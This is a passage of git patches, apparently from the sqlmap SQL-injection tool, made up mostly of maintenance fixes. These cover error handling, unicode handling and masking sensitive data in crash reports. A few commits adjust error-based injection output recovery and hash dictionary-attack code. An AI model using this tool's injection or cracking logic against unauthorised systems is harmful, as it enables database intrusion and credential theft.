-        content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
-        for match in re.finditer(r"<loc>\s*([^<]+)", content):
+        try:
+            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
+        except httplib.InvalidURL:
+            errMsg = "invalid URL given for sitemap ('%s')" % url
+            raise SqlmapSyntaxException, errMsg
+
+        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
             if abortedFlag:
                 break
             url = match.group(1).strip()

From a4d058d70cb89e88790c7003182733b033f80087 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 2 Nov 2014 10:55:38 +0100
Subject: [PATCH 114/492] More anonymization of unhanded exception data

---
 lib/core/common.py | 6 +++++-
 sqlmap.py          | 4 ++++
 2 files changed, 9 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6d69fbfd7..0182c2949 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -9,6 +9,7 @@ import codecs
 import contextlib
 import cookielib
 import copy
+import getpass
 import hashlib
 import httplib
 import inspect
@@ -2845,7 +2846,7 @@ def unhandledExceptionMessage():
     errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
     errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
 
-    return maskSensitiveData(errMsg)
+    return errMsg
 
 def createGithubIssue(errMsg, excMsg):
     """
@@ -2896,6 +2897,9 @@ def maskSensitiveData(msg):
             value = extractRegexResult(regex, retVal)
             retVal = retVal.replace(value, '*' * len(value))
 
+    if getpass.getuser():
+        retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
+
     return retVal
 
 def listToStrValue(value):
diff --git a/sqlmap.py b/sqlmap.py
index 3472b17a8..6a4683881 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -25,6 +25,7 @@ from lib.core.common import banner
 from lib.core.common import createGithubIssue
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
+from lib.core.common import maskSensitiveData
 from lib.core.common import setColor
 from lib.core.common import setPaths
 from lib.core.common import weAreFrozen
@@ -138,6 +139,9 @@ def main():
             file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
             excMsg = excMsg.replace(match.group(1), file_)
 
+        errMsg = maskSensitiveData(errMsg)
+        excMsg = maskSensitiveData(excMsg)
+
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL
         dataToStdout(excMsg)

From 1ef2c4006d035bae83c6aec5e392da74a9e266d2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 2 Nov 2014 11:01:46 +0100
Subject: [PATCH 115/492] Patch for an Issue #892

---
 lib/core/common.py | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 0182c2949..20824f268 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -857,8 +857,13 @@ def dataToOutFile(filename, data):
     if data:
         retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
 
-        with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
-            f.write(data)
+        try:
+            with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
+                f.write(data)
+        except IOError, ex:
+            errMsg = "something went wrong while trying to write "
+            errMsg += "to the output file ('%s')" % ex
+            raise SqlmapGenericException(errMsg)
 
     return retVal
 

From 9652e4122644ee10412af3fcf51801b4728c4608 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 2 Nov 2014 23:32:19 +0100
Subject: [PATCH 116/492] Path for an Issue #891

---
 lib/core/common.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 20824f268..166ecb3ce 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1082,7 +1082,6 @@ def setPaths():
     paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
     paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
     paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
-    paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
     paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
     paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
     paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
@@ -1091,6 +1090,10 @@ def setPaths():
     paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
     paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
 
+    for path in paths.values():
+        if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
+            checkFile(path)
+
 def weAreFrozen():
     """
     Returns whether we are frozen via py2exe.

From 05b446b95d7d49da47a8334e164dc9768db941f7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 2 Nov 2014 23:38:52 +0100
Subject: [PATCH 117/492] Patch for an Issue #893

---
 lib/core/target.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index dd0da7b3d..424ebef91 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -17,6 +17,7 @@ from lib.core.common import Backend
 from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import intersect
+from lib.core.common import normalizeUnicode
 from lib.core.common import paramToDict
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
@@ -573,7 +574,7 @@ def _createTargetDirs():
 
             paths.SQLMAP_OUTPUT_PATH = tempDir
 
-    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
+    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
 
     if not os.path.isdir(conf.outputPath):
         try:

From 954bd546896e6ea7dbb9f7c54287dc1e8c5263cd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 3 Nov 2014 08:31:50 +0100
Subject: [PATCH 118/492] Fix for an Issue #895

---
 plugins/dbms/mysql/takeover.py      | 1 +
 plugins/dbms/postgresql/takeover.py | 2 ++
 2 files changed, 3 insertions(+)

diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index 4457c9493..ec018ee82 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -5,6 +5,7 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
 import re
 
 from lib.core.agent import agent
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index 0c3a41584..6d29b6cb5 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -5,6 +5,8 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
+
 from lib.core.common import Backend
 from lib.core.common import randomStr
 from lib.core.data import kb

From 6f45596f28dc92331b4d2f36fa3c6653db1d03c8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 3 Nov 2014 23:48:44 +0100
Subject: [PATCH 119/492] Minor style update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 0c31f65cc..381ee15b1 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -538,7 +538,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github")
 
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

From 4d5b48b2ae3bb2b8c37fc246719fb65b87a62fd9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 4 Nov 2014 00:34:35 +0100
Subject: [PATCH 120/492] Patch for an Issue #896

---
 lib/core/common.py   | 32 +++++++++++++-------------------
 lib/core/testing.py  |  2 +-
 lib/parse/cmdline.py |  6 +++---
 3 files changed, 17 insertions(+), 23 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 166ecb3ce..c00793778 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -923,7 +923,7 @@ def readInput(message, default=None, checkBatch=True):
 
             try:
                 retVal = raw_input() or default
-                retVal = getUnicode(retVal, system=True) if retVal else retVal
+                retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
             except:
                 time.sleep(0.05)  # Reference: http://www.gossamer-threads.com/lists/python/python/781893
                 kb.prependFlag = True
@@ -1064,7 +1064,7 @@ def setPaths():
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
 
     _ = os.path.join(os.path.expanduser("~"), ".sqlmap")
-    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), system=True)
+    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
@@ -2009,7 +2009,7 @@ def getPartRun(alias=True):
     else:
         return retVal
 
-def getUnicode(value, encoding=None, system=False, noneToNull=False):
+def getUnicode(value, encoding=None, noneToNull=False):
     """
     Return the unicode representation of the supplied value:
 
@@ -2028,25 +2028,19 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
         value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
         return value
 
-    if not system:
-        if isinstance(value, unicode):
-            return value
-        elif isinstance(value, basestring):
-            while True:
-                try:
-                    return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
-                except UnicodeDecodeError, ex:
-                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
-        else:
+    if isinstance(value, unicode):
+        return value
+    elif isinstance(value, basestring):
+        while True:
             try:
-                return unicode(value)
-            except UnicodeDecodeError:
-                return unicode(str(value), errors="ignore")  # encoding ignored for non-basestring instances
+                return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
+            except UnicodeDecodeError, ex:
+                value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
     else:
         try:
-            return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
-        except:
-            return getUnicode(value, UNICODE_ENCODING)
+            return unicode(value)
+        except UnicodeDecodeError:
+            return unicode(str(value), errors="ignore")  # encoding ignored for non-basestring instances
 
 def longestCommonPrefix(*sequences):
     """
diff --git a/lib/core/testing.py b/lib/core/testing.py
index c2c96de0a..bc72de58c 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -285,7 +285,7 @@ def runCase(parse):
     elif result is False:  # this means no SQL injection has been detected - if None, ignore
         retVal = False
 
-    console = getUnicode(console, system=True)
+    console = getUnicode(console, encoding=sys.stdin.encoding)
 
     if parse and retVal:
         with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 0bfbbba77..a3cbfe582 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -41,7 +41,7 @@ def cmdLineParser():
 
     checkSystemEncoding()
 
-    _ = getUnicode(os.path.normpath(sys.argv[0]), system=True)
+    _ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding())
 
     usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
             "\"%s\"" % _ if " " in _ else _)
@@ -788,7 +788,7 @@ def cmdLineParser():
         advancedHelp = True
 
         for arg in sys.argv:
-            argv.append(getUnicode(arg, system=True))
+            argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
 
         checkDeprecatedOptions(argv)
 
@@ -837,7 +837,7 @@ def cmdLineParser():
                     break
 
             for arg in shlex.split(command):
-                argv.append(getUnicode(arg, system=True))
+                argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
 
         # Hide non-basic options in basic help case
         for i in xrange(len(argv)):

From 97cc679f9c18765eefe5b8eb2d66dd0d82c777d1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 4 Nov 2014 15:15:58 +0100
Subject: [PATCH 121/492] Fix for an Issue #900

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index c00793778..06004d9a7 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2025,7 +2025,7 @@ def getUnicode(value, encoding=None, noneToNull=False):
         return NULL
 
     if isListLike(value):
-        value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
+        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
         return value
 
     if isinstance(value, unicode):

From 78cc3853b6aaadb973389bf4a643f6788da7eb20 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 5 Nov 2014 09:56:50 +0100
Subject: [PATCH 122/492] Fix for an Issue #902

---
 lib/utils/hash.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index e414e7239..022e7eef4 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -665,7 +665,7 @@ def dictionaryAttack(attack_dict):
             if not hash_:
                 continue
 
-            hash_ = hash_.split()[0]
+            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
             regex = hashRecognition(hash_)
 
             if regex and regex not in hash_regexes:
@@ -682,7 +682,7 @@ def dictionaryAttack(attack_dict):
                 if not hash_:
                     continue
 
-                hash_ = hash_.split()[0]
+                hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
 
                 if re.match(hash_regex, hash_):
                     item = None

From 71c43be53a6f1780d067807352a1a3af2420455f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 5 Nov 2014 10:03:19 +0100
Subject: [PATCH 123/492] Patch for an Issue #901

---
 lib/request/connect.py | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index ded020cb0..0dce14365 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -62,6 +62,7 @@ from lib.core.enums import REDIRECTION
 from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapCompressionException
 from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapSyntaxException
 from lib.core.exception import SqlmapTokenException
 from lib.core.exception import SqlmapValueException
@@ -651,7 +652,13 @@ class Connect(object):
         if payload:
             if kb.tamperFunctions:
                 for function in kb.tamperFunctions:
-                    payload = function(payload=payload, headers=auxHeaders)
+                    try:
+                        payload = function(payload=payload, headers=auxHeaders)
+                    except Exception, ex:
+                        errMsg = "error occurred while running tamper "
+                        errMsg += "function '%s' ('%s')" % (function.func_name, ex)
+                        raise SqlmapGenericException(errMsg)
+
                     if not isinstance(payload, basestring):
                         errMsg = "tamper function '%s' returns " % function.func_name
                         errMsg += "invalid payload type ('%s')" % type(payload)

From a074efe75ed7302d4106c42eee253a52d841b5b7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 5 Nov 2014 10:46:11 +0100
Subject: [PATCH 124/492] Minor improvement of error-based SQLi when trimmed
 output is detected (trying to reconstruct)

---
 lib/techniques/error/use.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f6c960484..47098eb44 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
         try:
             while True:
                 check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
-                trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
+                trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)
 
                 if field:
                     nulledCastedField = agent.nullAndCastField(field)
@@ -130,6 +130,10 @@ def _oneShotErrorUse(expression, field=None):
                         warnMsg += safecharencode(trimmed)
                         logger.warn(warnMsg)
 
+                        if not kb.testMode:
+                            check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
+                            output = extractRegexResult(check, trimmed, re.IGNORECASE)
+
                 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
                     if offset == 1:
                         retVal = output

From a91fb4149b7c5e8db8a3ea14f26210c2c3131c07 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 5 Nov 2014 10:56:30 +0100
Subject: [PATCH 125/492] Minor update (using lower frequency alphabet for
 kb.chars)

---
 lib/core/option.py   | 5 +++--
 lib/core/settings.py | 3 +++
 2 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 21fe4f8c9..392d5eb19 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -106,6 +106,7 @@ from lib.core.settings import DUMMY_URL
 from lib.core.settings import INJECT_HERE_MARK
 from lib.core.settings import IS_WIN
 from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
+from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
 from lib.core.settings import LOCALHOST
 from lib.core.settings import MAX_CONNECT_RETRIES
 from lib.core.settings import MAX_NUMBER_OF_THREADS
@@ -1643,8 +1644,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 
     kb.chars = AttribDict()
     kb.chars.delimiter = randomStr(length=6, lowercase=True)
-    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
-    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
     kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
 
     kb.columnExistsChoice = None
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 381ee15b1..ebd6a5153 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -624,6 +624,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
 # Character used as a boundary in kb.chars (preferably less frequent letter)
 KB_CHARS_BOUNDARY_CHAR = 'q'
 
+# Letters of lower frequency used in kb.chars
+KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
+
 # CSS style used in HTML dump format
 HTML_DUMP_CSS_STYLE = """<style>
 table{

From 31f8d6e612acf1e7741ce21b1f9456452820773a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 6 Nov 2014 11:19:05 +0100
Subject: [PATCH 126/492] Fix for an Issue #904

---
 lib/core/dump.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index 4e1a06410..6646cc1fd 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -66,7 +66,11 @@ class Dump(object):
         if kb.get("multiThreadMode"):
             self._lock.acquire()
 
-        self._outputFP.write(text)
+        try:
+            self._outputFP.write(text)
+        except IOError, ex:
+            errMsg = "error occurred while writing to log file ('%s')" % ex
+            raise SqlmapGenericException(errMsg)
 
         if kb.get("multiThreadMode"):
             self._lock.release()

From d087565051b9b1074850b9e83c229d880dd966c8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 6 Nov 2014 11:41:10 +0100
Subject: [PATCH 127/492] Fix for Issues #905 and #906

---
 plugins/generic/users.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index 94599c8bb..1e7043c53 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -101,7 +101,9 @@ class Users:
             values = inject.getValue(query, blind=False, time=False)
 
             if not isNoneValue(values):
-                kb.data.cachedUsers = arrayizeValue(values)
+                kb.data.cachedUsers = []
+                for value in arrayizeValue(values):
+                    kb.data.cachedUsers.append(unArrayizeValue(value))
 
         if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
             infoMsg = "fetching number of database users"

From 8fdf9ff7468ccfbde135c1b9ba4e4c7d8f942e9d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 7 Nov 2014 15:47:42 +0100
Subject: [PATCH 128/492] Probable fix for an Issue #908

---
 lib/core/common.py | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 06004d9a7..eec126bc5 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1693,12 +1693,13 @@ def getConsoleWidth(default=80):
         width = int(os.getenv("COLUMNS"))
     else:
         try:
-            process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
-            stdout, _ = process.communicate()
-            items = stdout.split()
+            with open(os.devnull, 'w') as FNULL:
+                process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL)
+                stdout, _ = process.communicate()
+                items = stdout.split()
 
-            if len(items) == 2 and items[1].isdigit():
-                width = int(items[1])
+                if len(items) == 2 and items[1].isdigit():
+                    width = int(items[1])
         except OSError:
             pass
 

From 3b06665c9fa92fec54cbb98d89ee30cceb36be4a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 8 Nov 2014 21:22:03 +0100
Subject: [PATCH 129/492] Patch for an Issue #910

---
 lib/core/common.py | 15 +++++++++------
 1 file changed, 9 insertions(+), 6 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index eec126bc5..12f42a676 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1693,13 +1693,16 @@ def getConsoleWidth(default=80):
         width = int(os.getenv("COLUMNS"))
     else:
         try:
-            with open(os.devnull, 'w') as FNULL:
-                process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL)
-                stdout, _ = process.communicate()
-                items = stdout.split()
+            try:
+                FNULL = open(os.devnull, 'w')
+            except IOError:
+                FNULL = None
+            process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
+            stdout, _ = process.communicate()
+            items = stdout.split()
 
-                if len(items) == 2 and items[1].isdigit():
-                    width = int(items[1])
+            if len(items) == 2 and items[1].isdigit():
+                width = int(items[1])
         except OSError:
             pass
 

From 5e9c73f9c14a0660eacf2f4dbf46b53b040cb0ed Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 8 Nov 2014 21:44:46 +0100
Subject: [PATCH 130/492] Just in case update (for unhandled exceptions
 happening too soon)

---
 lib/core/common.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 12f42a676..3658940a1 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2903,6 +2903,12 @@ def maskSensitiveData(msg):
             value = extractRegexResult(regex, retVal)
             retVal = retVal.replace(value, '*' * len(value))
 
+    if not conf.get("hostname"):
+        match = re.search(r"(?i)sqlmap.+(-u|--url)\s+([^ ]+)", retVal)
+        if match:
+            retVal = retVal.replace(match.group(2), '*' * len(match.group(2)))
+
+
     if getpass.getuser():
         retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
 

From d400dc27f2f5e62bdb6148236053238b6739079b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 8 Nov 2014 21:54:34 +0100
Subject: [PATCH 131/492] Patch for an Issue #907

---
 plugins/generic/entries.py | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index b06306d65..7fac3c903 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -337,12 +337,17 @@ class Entries:
                     kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
                                                         "table": safeSQLIdentificatorNaming(tbl, True),
                                                         "db": safeSQLIdentificatorNaming(conf.db)}
-                    attackDumpedTable()
+                    try:
+                        attackDumpedTable()
+                    except Exception, ex:
+                        errMsg = "an error occurred while attacking "
+                        errMsg += "table dump ('%s')" % ex
+                        logger.critical(errMsg)
                     conf.dumper.dbTableValues(kb.data.dumpedTable)
 
-            except SqlmapConnectionException, e:
-                errMsg = "connection exception detected in dumping phase: "
-                errMsg += "'%s'" % e
+            except SqlmapConnectionException, ex:
+                errMsg = "connection exception detected in dumping phase "
+                errMsg += "('%s')" % ex
                 logger.critical(errMsg)
 
             finally:

From 62a73bf30b7cb103d055e34e33e5e93a3e9c1bcd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 9 Nov 2014 14:52:50 +0100
Subject: [PATCH 132/492] Minor fix for automatic removal of temporary files

---
 lib/core/bigarray.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 04ef7a691..36dfd7e42 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -35,6 +35,7 @@ class BigArray(list):
         self.cache = None
         self.length = 0
         self.filenames = set()
+        self._os_remove = os.remove
 
     def append(self, value):
         self.chunks[-1].append(value)
@@ -121,6 +122,6 @@ class BigArray(list):
     def __del__(self):
         for filename in self.filenames:
             try:
-                os.remove(filename)
+                self._os_remove(filename)
             except:
                 pass

From 9fe6ab749b083fd241d639a13d20435423a1d75b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 9 Nov 2014 15:08:44 +0100
Subject: [PATCH 133/492] Bug fix for occureance of ANSI color codes in
 multiprocessing hash cracking on Windows OS

---
 lib/core/option.py | 2 +-
 lib/utils/hash.py  | 7 +++++++
 2 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 392d5eb19..13b5afdbd 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2282,7 +2282,7 @@ def _resolveCrossReferences():
     lib.controller.checks.setVerbosity = setVerbosity
 
 def initOptions(inputOptions=AttribDict(), overrideOptions=False):
-    if not inputOptions.disableColoring:
+    if IS_WIN:
         coloramainit()
 
     _setConfAttributes()
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 022e7eef4..4e42bb769 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -69,6 +69,7 @@ from lib.core.settings import NULL
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import ROTATING_CHARS
 from lib.core.wordlist import Wordlist
+from thirdparty.colorama.initialise import init as coloramainit
 from thirdparty.pydes.pyDes import des
 from thirdparty.pydes.pyDes import CBC
 
@@ -508,6 +509,9 @@ def hashRecognition(value):
     return retVal
 
 def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
+        coloramainit()
+
     count = 0
     rotator = 0
     hashes = set([item[0][1] for item in attack_info])
@@ -581,6 +585,9 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
                 proc_count.value -= 1
 
 def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
